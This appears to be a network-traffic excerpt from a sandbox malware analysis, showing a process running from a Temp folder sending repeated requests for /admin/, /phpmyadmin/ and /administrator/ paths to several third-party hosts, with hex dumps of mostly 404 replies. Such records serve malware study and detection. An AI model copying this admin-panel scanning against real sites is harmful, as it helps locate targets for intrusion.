2023-11-30 10:22:50 UTC	234	OUT	GET /admin/ HTTP/1.1 Host: 6ail.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=10.116.88.132; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:51 UTC	719	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 35 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 34 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 32 31 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 30 35 2d 33 30 62 64 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:51 GMTContent-Type: text/htmlContent-Length: 12477Last-Modified: Mon, 13 Nov 2023 23:32:21 GMTConnection: closeETag: "6552b205-30bd"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJ
2023-11-30 10:22:51 UTC	12477	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.4	63783	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:50 UTC	161	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:51 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 35 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:51 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:51 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.4	63809	194.63.248.47	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:51 UTC	162	OUT	GET /admin HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:51 UTC	180	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 35 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:51 GMTServer: Apache/2.4.25 (Debian)Content-Length: 270Connection: closeContent-Type: text/html; charset=iso-8859-1
2023-11-30 10:22:51 UTC	270	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 443</address>

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.4	63784	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:51 UTC	161	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:51 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 35 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:51 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:51 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.4	65455	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:53 UTC	162	OUT	GET /admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:54 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 35 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:54 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:54 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.4	65454	194.63.248.47	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:53 UTC	163	OUT	GET /admin/ HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:54 UTC	180	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 35 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:54 GMTServer: Apache/2.4.25 (Debian)Content-Length: 270Connection: closeContent-Type: text/html; charset=iso-8859-1
2023-11-30 10:22:54 UTC	270	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 443</address>

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.4	49559	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:54 UTC	162	OUT	GET /admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:54 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 35 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:54 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:54 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.4	63277	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:22 UTC	167	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:22 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:22 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:22 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
2023-11-30 10:23:30 UTC	170	OUT	GET /administrator/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:30 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:30 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:30 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.4	65217	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:22 UTC	170	OUT	GET /administrator/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:23 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:23 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:23 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.4	50113	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:23 UTC	167	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:23 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:23 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:23 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.4	50421	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:23 UTC	219	OUT	GET /administrator/index.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://gco.uk/administrator/
2023-11-30 10:23:24 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 32 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:24 GMTContent-Type: text/htmlContent-Length: 162Connection: close
